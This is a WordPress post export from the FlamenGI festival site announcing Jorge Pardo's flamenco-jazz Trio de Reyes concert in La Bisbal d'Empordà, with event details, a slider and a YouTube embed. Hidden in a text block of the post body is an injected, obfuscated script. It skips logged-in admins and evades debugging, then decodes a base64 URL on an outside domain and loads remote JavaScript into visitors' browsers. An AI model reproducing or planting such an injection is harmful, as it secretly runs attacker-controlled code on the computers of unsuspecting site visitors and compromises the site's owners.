{"id":2872,"date":"2026-08-25T11:13:08","date_gmt":"2026-08-25T09:13:08","guid":{"rendered":"https:\/\/flamengi.cat\/?p=2872"},"modified":"2026-09-01T14:06:06","modified_gmt":"2026-09-01T12:06:06","slug":"jorge-pardo-trio-de-reyes-del-flamenco-divendres-20-de-novembre-a-les-21h-al-teatre-mundial-de-la-bisbal-demporda","status":"publish","type":"post","link":"https:\/\/flamengi.cat\/es\/jorge-pardo-trio-de-reyes-del-flamenco-divendres-20-de-novembre-a-les-21h-al-teatre-mundial-de-la-bisbal-demporda\/","title":{"rendered":"JORGE PARDO \u201cTR\u00cdO DE REYES DEL FLAMENCO\u201d<br> Viernes 20 de noviembre a las 21h en el Teatro Mundial de la Bisbal de Empord\u00e0"},"content":{"rendered":"\n\t\t<div id=\"fws_6a9bcf48867fb\"  data-column-margin=\"default\" data-midnight=\"dark\"  class=\"wpb_row vc_row-fluid vc_row full-width-content vc_row-o-equal-height vc_row-flex vc_row-o-content-top\"  style=\"padding-top: 0px; padding-bottom: 0px; \"><div class=\"row-bg-wrap\" data-bg-animation=\"none\" data-bg-animation-delay=\"\" data-bg-overlay=\"false\"><div class=\"inner-wrap row-bg-layer\" ><div class=\"row-bg viewport-desktop using-bg-color\"  style=\"background-color: #412939; \"><\/div><\/div><\/div><div class=\"row_col_wrap_12 col span_12 dark left\">\n\t<div  class=\"vc_col-sm-12 wpb_column column_container vc_column_container col centered-text padding-5-percent inherit_tablet inherit_phone \"  data-border-radius=\"10px\" data-padding-pos=\"all\" data-has-bg-color=\"false\" data-bg-color=\"\" data-bg-opacity=\"1\" data-animation=\"\" data-delay=\"0\" >\n\t\t<div class=\"vc_column-inner\" >\n\t\t\t<div class=\"wpb_wrapper\">\n\t\t\t\t<div class=\"nectar-cta  alignment_tablet_default alignment_phone_default display_tablet_inherit display_phone_inherit \" data-color=\"accent-color\" data-using-bg=\"true\" data-style=\"arrow-animation\" data-display=\"inline\" data-alignment=\"left\" data-text-color=\"custom\" ><h4 style=\"color: #ffffff;\"><span class=\"link_wrap\" style=\"padding-top: 20px; padding-right: 40px; padding-bottom: 20px; padding-left: 40px;\"><a target=\"_blank\" class=\"link_text\" href=\"https:\/\/entradium.com\/events\/jorge-pardo-trio-de-reyes-del-flamenco\"><span class=\"text\">Reserva d'entrades<\/span><svg class=\"next-arrow\" aria-hidden=\"true\" width=\"20px\" height=\"25px\" viewBox=\"0 0 50 80\" xml:space=\"preserve\">\n  <polyline stroke=\"#ffffff\" stroke-width=\"9\" fill=\"none\" stroke-linecap=\"round\" stroke-linejoin=\"round\" points=\"0, 0 45, 40 0, 80\"\/>\n  <\/svg>  <span class=\"line\"  style=\"background-color: #ffffff;\"><\/span> <\/a><\/span><\/h4><\/div>\n\t\t\t<\/div> \n\t\t<\/div>\n\t<\/div> \n<\/div><\/div>\n\t\t<div id=\"fws_6a9bcf488746a\"  data-column-margin=\"default\" data-midnight=\"dark\"  class=\"wpb_row vc_row-fluid vc_row\"  style=\"padding-top: 0px; padding-bottom: 0px; \"><div class=\"row-bg-wrap\" data-bg-animation=\"none\" data-bg-animation-delay=\"\" data-bg-overlay=\"false\"><div class=\"inner-wrap row-bg-layer\" ><div class=\"row-bg viewport-desktop\"  style=\"\"><\/div><\/div><\/div><div class=\"row_col_wrap_12 col span_12 dark left\">\n\t<div  class=\"vc_col-sm-12 wpb_column column_container vc_column_container col padding-2-percent inherit_tablet inherit_phone \"  data-padding-pos=\"all\" data-has-bg-color=\"false\" data-bg-color=\"\" data-bg-opacity=\"1\" data-animation=\"\" data-delay=\"0\" >\n\t\t<div class=\"vc_column-inner\" >\n\t\t\t<div class=\"wpb_wrapper\">\n\t\t\t\t\n<div class=\"wpb_text_column wpb_content_element \" >\n\t<div class=\"wpb_wrapper\">\n\t\t<p><strong>Jorge Pardo Trio de Reyes \u2013 Flamenc\/Jazz<\/strong><\/p>\n<p>El reconegut saxofonista i flautista<strong> Jorge Pardo<\/strong>, una de les figures imprescindibles del flamenc i el jazz contemporanis, arriba a FlamenGI amb <strong>Trio de Reyes<\/strong>, un projecte que comparteix amb el guitarrista <strong>Mel\u00f3n Jim\u00e9nez<\/strong> i el percussionista <strong>JM Bandolero<\/strong>. Tres m\u00fasics d&#8217;excel\u00b7l\u00e8ncia que dialoguen des del respecte a les arrels del flamenc i la llibertat creativa pr\u00f2pia del jazz.<\/p>\n<p>L&#8217;espectacle explora els punts de trobada entre dos llenguatges musicals que comparteixen l&#8217;ess\u00e8ncia del ritme, la improvisaci\u00f3 i l&#8217;expressi\u00f3. Soleares, seguiriyas, tangos, tarantos o buleries es reinventen a trav\u00e9s d&#8217;una interpretaci\u00f3 viva i contempor\u00e0nia, sense perdre mai el vincle amb la tradici\u00f3.<\/p>\n<p>M\u00e9s que un concert, <strong>Trio de Reyes<\/strong> proposa una experi\u00e8ncia musical immersiva en qu\u00e8 la complicitat entre els artistes i el p\u00fablic esdev\u00e9 protagonista. Cada actuaci\u00f3 \u00e9s \u00fanica, constru\u00efda des de l&#8217;escolta, la improvisaci\u00f3 col\u00b7lectiva i el comprom\u00eds compartit amb una m\u00fasica que evoluciona constantment sense renunciar a la seva identitat.<\/p>\n<p><strong>Int\u00e8rprets: <\/strong><\/p>\n<p><strong>Saxo i flauta travessera:<\/strong> Jorge Pardo<\/p>\n<p><strong>Guitarra:<\/strong> \u201cMelon\u201d Jimenez<\/p>\n<p><strong>Percussi\u00f3:<\/strong> JM \u201cBandolero\u201d<\/p>\n<p>&nbsp;<\/p>\n<p><strong>Tipologia:<\/strong> Flamenc-Jazz<\/p>\n<p><strong>Data i hora:<\/strong> 20 de novembre a les 21h<\/p>\n<p><strong>Espai:<\/strong> Teatre Mundial de la Bisbal d\u2019Empord\u00e0<\/p>\n<p><strong>Preu de l&#8217;entrada:<\/strong> Desde 22\u20ac<\/p>\n<p>&nbsp;<\/p>\n\t<\/div>\n<\/div>\n\n\n\n<div id=\"fws_6a9bcf4887bb0\" data-midnight=\"\" data-column-margin=\"default\" class=\"wpb_row vc_row-fluid vc_row inner_row vc_row-o-equal-height vc_row-flex vc_row-o-content-middle\"  style=\"\"><div class=\"row-bg-wrap\"> <div class=\"row-bg\" ><\/div> <\/div><div class=\"row_col_wrap_12_inner col span_12  left\">\n\t<div style=\"\" class=\"vc_col-sm-12 wpb_column column_container vc_column_container col child_column padding-3-percent inherit_tablet inherit_phone \"  data-using-bg=\"true\" data-shadow=\"medium_depth\" data-border-radius=\"10px\" data-padding-pos=\"all\" data-has-bg-color=\"true\" data-bg-color=\"#573278\" data-bg-opacity=\"1\" data-animation=\"\" data-delay=\"0\" >\n\t\t<div class=\"vc_column-inner\" ><div class=\"column-bg-overlay-wrap column-bg-layer\" data-bg-animation=\"none\"><div class=\"column-bg-overlay\" style=\"opacity: 1; background-color: #573278;\"><\/div><\/div>\n\t\t<div class=\"wpb_wrapper\">\n\t\t\t\n<div class=\"wpb_text_column wpb_content_element \" >\n\t<div class=\"wpb_wrapper\">\n\t\t<h3 style=\"color: #ffffff;\">Data: 20 de Novembre<br \/>\n<span style=\"color: #ffffff;\">Hora:<\/span> 21:00h<br \/>\n<span style=\"color: #ffffff;\">Lloc: <\/span>\u00a0Teatre Mundial de la Bisbal d\u2019Empord\u00e0<\/h3>\n\t<\/div>\n<\/div>\n\n\n\n\n\t\t<\/div> \n\t<\/div>\n\t<\/div> \n<\/div><\/div>\n\t\t\t<\/div> \n\t\t<\/div>\n\t<\/div> \n<\/div><\/div>\n\t\t<div id=\"fws_6a9bcf488845b\"  data-column-margin=\"default\" data-midnight=\"dark\" data-top-percent=\"2%\" data-bottom-percent=\"2%\" data-nectar-animated-gradient-settings=\"{&quot;color_1&quot;:&quot;#f1e5c1&quot;,&quot;color_2&quot;:&quot;#f1e5c1&quot;,&quot;speed&quot;:&quot;1300&quot;,&quot;blending_mode&quot;:&quot;linear&quot;}\"  class=\"wpb_row vc_row-fluid vc_row full-width-content vc_row-o-equal-height vc_row-flex vc_row-o-content-top  top_margin_5pct scale_desktop_1-02 rotate_desktop_2deg nectar-overflow-hidden\"  style=\"padding-top: calc(100vw * 0.02); padding-bottom: calc(100vw * 0.02); \"><div class=\"row-bg-wrap has-animated-gradient\" data-bg-animation=\"none\" data-bg-animation-delay=\"\" data-bg-overlay=\"false\"><div class=\"inner-wrap row-bg-layer\" ><div class=\"row-bg viewport-desktop using-bg-color\"  style=\"background-color: #c7e7e8; \"><\/div><\/div><div class=\"row-bg-overlay row-bg-layer\" style=\"\"><\/div><\/div><div class=\"row_col_wrap_12 col span_12 dark left\">\n\t<div  class=\"vc_col-sm-12 wpb_column column_container vc_column_container col no-extra-padding el_spacing_0px inherit_tablet inherit_phone \"  data-padding-pos=\"all\" data-has-bg-color=\"false\" data-bg-color=\"\" data-bg-opacity=\"1\" data-animation=\"\" data-delay=\"0\" data-scroll-animation=\"true\" data-scroll-animation-movement=\"transform_x\" data-scroll-animation-mobile=\"true\" data-scroll-animation-intensity=\"-2.5\" >\n\t\t<div class=\"vc_column-inner\" >\n\t\t\t<div class=\"wpb_wrapper\">\n\t\t\t\t<div class=\"nectar-scrolling-text font_size_4vw font_size_mobile_9vw text_space_medium \" data-style=\"default\" data-s-dir=\"rtl\" data-spacing=\"true\" data-outline-thickness=\"thin\" data-s-speed=\"slowest\" data-overflow=\"visible\" ><div class=\"nectar-scrolling-text-inner\" style=\"color: #ffffff;\">\n<h2>JORGE PARDO \u201cTR\u00cdO DE REYES DEL FLAMENCO\u201d | Divendres 20 de novembre<\/h2>\n\n<h2>JORGE PARDO \u201cTR\u00cdO DE REYES DEL FLAMENCO\u201d | Divendres 20 de novembre<\/h2>\n\n<h2>JORGE PARDO \u201cTR\u00cdO DE REYES DEL FLAMENCO\u201d | Divendres 20 de novembre<\/h2>\n\n<h2>JORGE PARDO \u201cTR\u00cdO DE REYES DEL FLAMENCO\u201d | Divendres 20 de novembre<\/h2>\n\n<h2>JORGE PARDO \u201cTR\u00cdO DE REYES DEL FLAMENCO\u201d | Divendres 20 de novembre<\/h2>\n<\/div><\/div>\n\t\t\t<\/div> \n\t\t<\/div>\n\t<\/div> \n<\/div><\/div>\n\t\t<div id=\"fws_6a9bcf4888cdb\"  data-column-margin=\"default\" data-midnight=\"dark\" data-top-percent=\"2%\" data-bottom-percent=\"2%\" data-nectar-animated-gradient-settings=\"{&quot;color_1&quot;:&quot;#f1e5c1&quot;,&quot;color_2&quot;:&quot;#f1e5c1&quot;,&quot;speed&quot;:&quot;1300&quot;,&quot;blending_mode&quot;:&quot;linear&quot;}\"  class=\"wpb_row vc_row-fluid vc_row full-width-content vc_row-o-equal-height vc_row-flex vc_row-o-content-top  bottom_margin_5pct zindex-set scale_desktop_1-02 rotate_desktop_358deg nectar-overflow-hidden\"  style=\"padding-top: calc(100vw * 0.02); padding-bottom: calc(100vw * 0.02);  z-index: 20;\"><div class=\"row-bg-wrap has-animated-gradient\" data-bg-animation=\"none\" data-bg-animation-delay=\"\" data-bg-overlay=\"false\"><div class=\"inner-wrap row-bg-layer\" ><div class=\"row-bg viewport-desktop using-bg-color\"  style=\"background-color: #c7e7e8; \"><\/div><\/div><\/div><div class=\"row_col_wrap_12 col span_12 dark left\">\n\t<div  class=\"vc_col-sm-12 wpb_column column_container vc_column_container col no-extra-padding el_spacing_0px inherit_tablet inherit_phone \"  data-padding-pos=\"all\" data-has-bg-color=\"false\" data-bg-color=\"\" data-bg-opacity=\"1\" data-animation=\"\" data-delay=\"0\" data-scroll-animation=\"true\" data-scroll-animation-movement=\"transform_x\" data-scroll-animation-mobile=\"true\" data-scroll-animation-intensity=\"2.5\" >\n\t\t<div class=\"vc_column-inner\" >\n\t\t\t<div class=\"wpb_wrapper\">\n\t\t\t\t<div class=\"nectar-scrolling-text font_size_4vw font_size_mobile_9vw text_space_medium \" data-style=\"default\" data-s-dir=\"ltr\" data-spacing=\"true\" data-outline-thickness=\"thin\" data-s-speed=\"slowest\" data-overflow=\"visible\" ><div class=\"nectar-scrolling-text-inner\" style=\"color: #ffffff;\">\n<h2>JORGE PARDO \u201cTR\u00cdO DE REYES DEL FLAMENCO\u201d | Divendres 20 de novembre<\/h2>\n\n<h2>JORGE PARDO \u201cTR\u00cdO DE REYES DEL FLAMENCO\u201d | Divendres 20 de novembre<\/h2>\n\n<h2>JORGE PARDO \u201cTR\u00cdO DE REYES DEL FLAMENCO\u201d | Divendres 20 de novembre<\/h2>\n\n<h2>JORGE PARDO \u201cTR\u00cdO DE REYES DEL FLAMENCO\u201d | Divendres 20 de novembre<\/h2>\n\n<h2>JORGE PARDO \u201cTR\u00cdO DE REYES DEL FLAMENCO\u201d | Divendres 20 de novembre<\/h2>\n<\/div><\/div>\n\t\t\t<\/div> \n\t\t<\/div>\n\t<\/div> \n<\/div><\/div>\n\t\t<div id=\"fws_6a9bcf48893b7\"  data-column-margin=\"default\" data-midnight=\"dark\"  class=\"wpb_row vc_row-fluid vc_row\"  style=\"padding-top: 0px; padding-bottom: 0px; \"><div class=\"row-bg-wrap\" data-bg-animation=\"none\" data-bg-animation-delay=\"\" data-bg-overlay=\"false\"><div class=\"inner-wrap row-bg-layer\" ><div class=\"row-bg viewport-desktop\"  style=\"\"><\/div><\/div><\/div><div class=\"row_col_wrap_12 col span_12 dark left\">\n\t<div  class=\"vc_col-sm-12 wpb_column column_container vc_column_container col padding-3-percent inherit_tablet inherit_phone \"  data-padding-pos=\"all\" data-has-bg-color=\"false\" data-bg-color=\"\" data-bg-opacity=\"1\" data-animation=\"\" data-delay=\"0\" >\n\t\t<div class=\"vc_column-inner\" >\n\t\t\t<div class=\"wpb_wrapper\">\n\t\t\t\t\n\t<div class=\"wpb_gallery wpb_content_element clearfix\">\n\t\t<div class=\"wpb_wrapper\"><div class=\"wpb_gallery_slidesnectarslider_style\" data-onclick=\"link_no\" data-interval=\"5\"><div class=\"nectar-slider-wrap\" style=\"height: 667pxpx\" data-flexible-height=\"\" data-overall_style=\"classic\" data-button-styling=\"btn_with_count\" data-fullscreen=\"false\"  data-full-width=\"false\" data-parallax=\"false\" data-autorotate=\"5500\" id=\"ns-id-6a9bcf4889cc4\"><div class=\"swiper-container\" style=\"height: 667pxpx\"  data-loop=\"true\" data-height=\"667px\" data-bullets=\"\" data-bullet_style=\"see_through\" data-arrows=\"true\" data-desktop-swipe=\"true\" data-settings=\"\"><div class=\"swiper-wrapper\"><div class=\"swiper-slide\" data-bg-alignment=\"center\" data-color-scheme=\"light\" data-x-pos=\"centered\" data-y-pos=\"middle\"><div class=\"image-bg\" style=\"background-image: url(https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/Jorge-Pardo-81.jpg-1.jpeg);\">  &nbsp; <\/div><span class=\"ie-fix\"><\/span> <\/div><!--\/swiper-slide--><div class=\"swiper-slide\" data-bg-alignment=\"center\" data-color-scheme=\"light\" data-x-pos=\"centered\" data-y-pos=\"middle\"><div class=\"image-bg\" style=\"background-image: url(https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/Jorge-Pardo-04.jpg.jpeg);\">  &nbsp; <\/div><span class=\"ie-fix\"><\/span> <\/div><!--\/swiper-slide--><div class=\"swiper-slide\" data-bg-alignment=\"center\" data-color-scheme=\"light\" data-x-pos=\"centered\" data-y-pos=\"middle\"><div class=\"image-bg\" style=\"background-image: url(https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/Jorge-Pardo-76.jpg.jpeg);\">  &nbsp; <\/div><span class=\"ie-fix\"><\/span> <\/div><!--\/swiper-slide--><div class=\"swiper-slide\" data-bg-alignment=\"center\" data-color-scheme=\"light\" data-x-pos=\"centered\" data-y-pos=\"middle\"><div class=\"image-bg\" style=\"background-image: url(https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/2bb5477c-9637-45f4-8916-0dbd7d86b8c7.JPG.jpeg);\">  &nbsp; <\/div><span class=\"ie-fix\"><\/span> <\/div><!--\/swiper-slide--><div class=\"swiper-slide\" data-bg-alignment=\"center\" data-color-scheme=\"light\" data-x-pos=\"centered\" data-y-pos=\"middle\"><div class=\"image-bg\" style=\"background-image: url(https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/2018-02-18-23.23.38.jpg.jpeg);\">  &nbsp; <\/div><span class=\"ie-fix\"><\/span> <\/div><!--\/swiper-slide--><\/div><a href=\"\" class=\"slider-prev\"><i class=\"icon-salient-left-arrow\"><\/i> <div class=\"slide-count\"> <span class=\"slide-current\">1<\/span> <i class=\"icon-salient-right-line\"><\/i> <span class=\"slide-total\"><\/span> <\/div> <\/a>\n\t\t\t     \t\t<a href=\"\" class=\"slider-next\"><i class=\"icon-salient-right-arrow\"><\/i> <div class=\"slide-count\"> <span class=\"slide-current\">1<\/span> <i class=\"icon-salient-right-line\"><\/i> <span class=\"slide-total\"><\/span> <\/div> <\/a><div class=\"nectar-slider-loading\"><\/div><\/div><\/div><\/div>\n\t\t<\/div> \n\t<\/div> \n\t\t\t<\/div> \n\t\t<\/div>\n\t<\/div> \n<\/div><\/div>\n\t\t<div id=\"fws_6a9bcf48ba637\"  data-column-margin=\"default\" data-midnight=\"dark\"  class=\"wpb_row vc_row-fluid vc_row\"  style=\"padding-top: 0px; padding-bottom: 0px; \"><div class=\"row-bg-wrap\" data-bg-animation=\"none\" data-bg-animation-delay=\"\" data-bg-overlay=\"false\"><div class=\"inner-wrap row-bg-layer\" ><div class=\"row-bg viewport-desktop\"  style=\"\"><\/div><\/div><\/div><div class=\"row_col_wrap_12 col span_12 dark left\">\n\t<div  class=\"vc_col-sm-12 wpb_column column_container vc_column_container col no-extra-padding inherit_tablet inherit_phone \"  data-padding-pos=\"all\" data-has-bg-color=\"false\" data-bg-color=\"\" data-bg-opacity=\"1\" data-animation=\"\" data-delay=\"0\" >\n\t\t<div class=\"vc_column-inner\" >\n\t\t\t<div class=\"wpb_wrapper\">\n\t\t\t\t\n<div class=\"wpb_text_column wpb_content_element \" >\n\t<div class=\"wpb_wrapper\">\n\t\t<p><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')&#091;0&#093;||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n\t<\/div>\n<\/div>\n\n\n\n\n\t<div class=\"wpb_video_widget wpb_content_element vc_clearfix   vc_video-aspect-ratio-169 vc_video-el-width-100 vc_video-align-left\" >\n\t\t<div class=\"wpb_wrapper\">\n\t\t\t\n\t\t\t<div class=\"wpb_video_wrapper\"><iframe loading=\"lazy\" title=\"Flamenco Jazz on the Flute | Jorge Pardo Trio \u00b7 MarchVivo\" width=\"1080\" height=\"608\" src=\"https:\/\/www.youtube.com\/embed\/gpykIX8M3zs?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe><\/div>\n\t\t<\/div>\n\t<\/div>\n\n\t\t\t<\/div> \n\t\t<\/div>\n\t<\/div> \n<\/div><\/div>\n","protected":false},"excerpt":{"rendered":"Reserva d'entrades Jorge Pardo Trio de Reyes \u2013 Flamenc\/Jazz El reconegut saxofonista i flautista Jorge Pardo, una de les figures imprescindibles del flamenc i el jazz contemporanis, arriba a FlamenGI...","protected":false},"author":4,"featured_media":2874,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[122],"tags":[],"class_list":["post-2872","post","type-post","status-publish","format-standard","has-post-thumbnail","category-edicio-2026"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v19.5 (Yoast SEO v27.8) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>FLAMENGI FESTIVAL<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/flamengi.cat\/es\/jorge-pardo-trio-de-reyes-del-flamenco-divendres-20-de-novembre-a-les-21h-al-teatre-mundial-de-la-bisbal-demporda\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"JORGE PARDO \u201cTR\u00cdO DE REYES DEL FLAMENCO\u201d Divendres 20 de novembre a les 21h al Teatre Mundial de la Bisbal d\u2019Empord\u00e0\" \/>\n<meta property=\"og:url\" content=\"https:\/\/flamengi.cat\/es\/jorge-pardo-trio-de-reyes-del-flamenco-divendres-20-de-novembre-a-les-21h-al-teatre-mundial-de-la-bisbal-demporda\/\" \/>\n<meta property=\"og:site_name\" content=\"FLAMENGI FESTIVAL\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/flamengi.festival\" \/>\n<meta property=\"article:published_time\" content=\"2026-08-25T09:13:08+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-09-01T12:06:06+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/Jorge-Pardo-81.jpg.jpeg\" \/>\n\t<meta property=\"og:image:width\" content=\"1200\" \/>\n\t<meta property=\"og:image:height\" content=\"800\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Neoserveis\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@flamengif\" \/>\n<meta name=\"twitter:site\" content=\"@flamengif\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Neoserveis\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/flamengi.cat\\\/jorge-pardo-trio-de-reyes-del-flamenco-divendres-20-de-novembre-a-les-21h-al-teatre-mundial-de-la-bisbal-demporda\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/flamengi.cat\\\/jorge-pardo-trio-de-reyes-del-flamenco-divendres-20-de-novembre-a-les-21h-al-teatre-mundial-de-la-bisbal-demporda\\\/\"},\"author\":{\"name\":\"Neoserveis\",\"@id\":\"https:\\\/\\\/flamengi.cat\\\/#\\\/schema\\\/person\\\/99252030689047d68b309be665c89c41\"},\"headline\":\"JORGE PARDO \u201cTR\u00cdO DE REYES DEL FLAMENCO\u201d Divendres 20 de novembre a les 21h al Teatre Mundial de la Bisbal d\u2019Empord\u00e0\",\"datePublished\":\"2026-08-25T09:13:08+00:00\",\"dateModified\":\"2026-09-01T12:06:06+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/flamengi.cat\\\/jorge-pardo-trio-de-reyes-del-flamenco-divendres-20-de-novembre-a-les-21h-al-teatre-mundial-de-la-bisbal-demporda\\\/\"},\"wordCount\":1750,\"image\":{\"@id\":\"https:\\\/\\\/flamengi.cat\\\/jorge-pardo-trio-de-reyes-del-flamenco-divendres-20-de-novembre-a-les-21h-al-teatre-mundial-de-la-bisbal-demporda\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/flamengi.cat\\\/wp-content\\\/uploads\\\/2026\\\/08\\\/Jorge-Pardo-81.jpg.jpeg\",\"articleSection\":[\"Edici\u00f3 2026\"],\"inLanguage\":\"es\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/flamengi.cat\\\/jorge-pardo-trio-de-reyes-del-flamenco-divendres-20-de-novembre-a-les-21h-al-teatre-mundial-de-la-bisbal-demporda\\\/\",\"url\":\"https:\\\/\\\/flamengi.cat\\\/jorge-pardo-trio-de-reyes-del-flamenco-divendres-20-de-novembre-a-les-21h-al-teatre-mundial-de-la-bisbal-demporda\\\/\",\"name\":\"JORGE PARDO \u201cTR\u00cdO DE REYES DEL FLAMENCO\u201d Divendres 20 de novembre a les 21h al Teatre Mundial de la Bisbal d\u2019Empord\u00e0 - FLAMENGI FESTIVAL\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/flamengi.cat\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/flamengi.cat\\\/jorge-pardo-trio-de-reyes-del-flamenco-divendres-20-de-novembre-a-les-21h-al-teatre-mundial-de-la-bisbal-demporda\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/flamengi.cat\\\/jorge-pardo-trio-de-reyes-del-flamenco-divendres-20-de-novembre-a-les-21h-al-teatre-mundial-de-la-bisbal-demporda\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/flamengi.cat\\\/wp-content\\\/uploads\\\/2026\\\/08\\\/Jorge-Pardo-81.jpg.jpeg\",\"datePublished\":\"2026-08-25T09:13:08+00:00\",\"dateModified\":\"2026-09-01T12:06:06+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/flamengi.cat\\\/#\\\/schema\\\/person\\\/99252030689047d68b309be665c89c41\"},\"breadcrumb\":{\"@id\":\"https:\\\/\\\/flamengi.cat\\\/jorge-pardo-trio-de-reyes-del-flamenco-divendres-20-de-novembre-a-les-21h-al-teatre-mundial-de-la-bisbal-demporda\\\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/flamengi.cat\\\/jorge-pardo-trio-de-reyes-del-flamenco-divendres-20-de-novembre-a-les-21h-al-teatre-mundial-de-la-bisbal-demporda\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/flamengi.cat\\\/jorge-pardo-trio-de-reyes-del-flamenco-divendres-20-de-novembre-a-les-21h-al-teatre-mundial-de-la-bisbal-demporda\\\/#primaryimage\",\"url\":\"https:\\\/\\\/flamengi.cat\\\/wp-content\\\/uploads\\\/2026\\\/08\\\/Jorge-Pardo-81.jpg.jpeg\",\"contentUrl\":\"https:\\\/\\\/flamengi.cat\\\/wp-content\\\/uploads\\\/2026\\\/08\\\/Jorge-Pardo-81.jpg.jpeg\",\"width\":1200,\"height\":800},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/flamengi.cat\\\/jorge-pardo-trio-de-reyes-del-flamenco-divendres-20-de-novembre-a-les-21h-al-teatre-mundial-de-la-bisbal-demporda\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Inici\",\"item\":\"https:\\\/\\\/flamengi.cat\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"JORGE PARDO \u201cTR\u00cdO DE REYES DEL FLAMENCO\u201d Divendres 20 de novembre a les 21h al Teatre Mundial de la Bisbal d\u2019Empord\u00e0\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/flamengi.cat\\\/#website\",\"url\":\"https:\\\/\\\/flamengi.cat\\\/\",\"name\":\"FLAMENGI FESTIVAL\",\"description\":\"Festival Flamenc de Girona\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/flamengi.cat\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/flamengi.cat\\\/#\\\/schema\\\/person\\\/99252030689047d68b309be665c89c41\",\"name\":\"Neoserveis\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/d8d15510fd9d2ea0dab012c24b4fd873280996e13c5f523dcfe6d9310d6cd5ac?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/d8d15510fd9d2ea0dab012c24b4fd873280996e13c5f523dcfe6d9310d6cd5ac?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/d8d15510fd9d2ea0dab012c24b4fd873280996e13c5f523dcfe6d9310d6cd5ac?s=96&d=mm&r=g\",\"caption\":\"Neoserveis\"},\"url\":\"https:\\\/\\\/flamengi.cat